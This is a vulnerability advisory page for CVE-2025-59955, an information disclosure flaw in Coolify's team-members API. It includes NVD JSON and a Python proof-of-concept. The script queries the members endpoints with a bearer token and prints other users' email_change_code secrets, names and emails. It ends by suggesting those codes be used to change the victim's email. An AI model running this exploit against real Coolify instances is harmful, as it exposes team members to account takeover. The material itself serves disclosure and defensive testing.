Security Vulnerability Report
CVE-2025-59955 CVSS 5.7 MEDIUM

CVE-2025-59955

Published: 2026-01-05 18:15:44
Last Modified: 2026-01-12 14:48:13

Description

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.8 have an information disclosure vulnerability in the `/api/v1/teams/{team_id}/members` and `/api/v1/teams/current/members` API endpoints that allows authenticated team members to read the highly sensitive `email_change_code` of other users on the same team. This code is intended for single-use email change verification and should be kept secret. Its exposure could enable a malicious actor to perform an unauthorized email address change on behalf of the victim. As of the time of publication, no known patched versions exist.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:coollabs:coolify:4.0.0:beta428:*:*:*:*:*:* - VULNERABLE
Coolify v4.0.0-beta.420.8及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-59955 PoC - Coolify email_change_code Information Disclosure
Note: This is for educational and authorized testing purposes only.

What this script checks: whether the team-members endpoints of a Coolify
instance return an `email_change_code` field for team members. That field
is a single-use verification secret and must never appear in API output,
so any non-empty value returned here is the finding.

Defender notes:
- Mitigation is on the server side: the members resource serialization
  should omit `email_change_code` (the advisory reports no patched version
  at publication time; check the vendor advisory for current status).
- Detection: requests to `/api/v1/teams/*/members` are ordinary team
  activity, so this leak is not distinguishable by endpoint alone; audit
  logging of email-change events is the more useful signal.
- The output of this script contains secrets; treat it as sensitive.
"""
import requests
import json
import sys  # NOTE(review): imported but never used below

# Configuration
# NOTE(review): placeholder value — must be replaced with the instance under
# authorized test; no default target is implied.
TARGET_URL = "https://your-coolify-instance.com"
# Replace with your actual authentication token (JWT)
# The advisory requires an authenticated team member (PR:L in the CVSS
# vector); an unauthenticated request is expected to receive 401 below.
AUTH_TOKEN = "your-jwt-token-here"
# Replace with the target team_id or use 'current'
TEAM_ID = "current"


def exploit() -> None:
    """Exploit the information disclosure vulnerability.

    Requests each members endpoint with the configured bearer token,
    prints any `email_change_code` values found in the JSON body, and
    prints a 500-character preview of the raw response. Returns nothing;
    all results go to stdout. Network/HTTP errors are reported and do not
    stop iteration over the remaining endpoints.
    """
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    # Target endpoints that leak email_change_code
    # NOTE(review): when TEAM_ID == "current" both entries resolve to the
    # same URL, so the second request is redundant.
    endpoints = [
        f"/api/v1/teams/{TEAM_ID}/members",
        "/api/v1/teams/current/members"
    ]
    print("[*] CVE-2025-59955 - Coolify Information Disclosure")
    print(f"[*] Target: {TARGET_URL}")
    print()
    for endpoint in endpoints:
        url = f"{TARGET_URL}{endpoint}"
        print(f"[*] Requesting: {endpoint}")
        try:
            # timeout bounds the wait on an unresponsive host
            response = requests.get(url, headers=headers, timeout=10)
            if response.status_code == 200:
                data = response.json()
                print(f"[+] Success! Received response from {endpoint}")
                print(f"[+] Status Code: {response.status_code}")
                # Extract email_change_code from response
                # Two response shapes are handled: a bare list of members,
                # or an object wrapping the list under "data". Any other
                # shape is not inspected (only the preview below is shown).
                if isinstance(data, list):
                    for member in data:
                        # NOTE(review): assumes each element is a dict;
                        # a non-mapping element would raise TypeError here.
                        if 'email_change_code' in member:
                            print(f"[!] LEAKED: email_change_code = {member['email_change_code']}")
                            print(f"[!] For user: {member.get('name', 'Unknown')} ({member.get('email', 'Unknown')})")
                elif isinstance(data, dict) and 'data' in data:
                    for member in data['data']:
                        if 'email_change_code' in member:
                            print(f"[!] LEAKED: email_change_code = {member['email_change_code']}")
                            print(f"[!] For user: {member.get('name', 'Unknown')} ({member.get('email', 'Unknown')})")
                # Show full response for analysis
                # The preview is the raw body and may itself contain the
                # secret values even when the field-by-field scan above
                # matched nothing — handle stdout accordingly.
                print(f"[+] Full response preview:")
                print(json.dumps(data, indent=2)[:500])
                print()
            elif response.status_code == 401:
                print(f"[-] Authentication failed (401)")
            elif response.status_code == 403:
                print(f"[-] Access denied (403)")
            else:
                print(f"[-] Request failed with status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            # Connection, timeout and (on recent requests versions) JSON
            # decode errors land here; the loop continues with the next URL.
            print(f"[-] Request error: {e}")
    print("\n[*] Note: Use obtained email_change_code to change victim's email")
    print("[*] This PoC is for authorized security testing only.")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59955", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:43.927", "lastModified": "2026-01-12T14:48:13.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.8 have an information disclosure vulnerability in the `/api/v1/teams/{team_id}/members` and `/api/v1/teams/current/members` API endpoints allows authenticated team members to access a highly sensitive `email_change_code` from other users on the same team. This code is intended for a single-use email change verification and should be kept secret. Its exposure could enable a malicious actor to perform an unauthorized email address change on behalf of the victim. As of time of publication, no known patched versions exist."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-214"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta428:*:*:*:*:*:*", "matchCriteriaId": "EC99CFF7-91C6-45EF-9031-269E70C12263"}]}]}], "references": [{"url": "https://github.com/coollabsio/coolify/security/advisories/GHSA-927g-56xp-6427", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}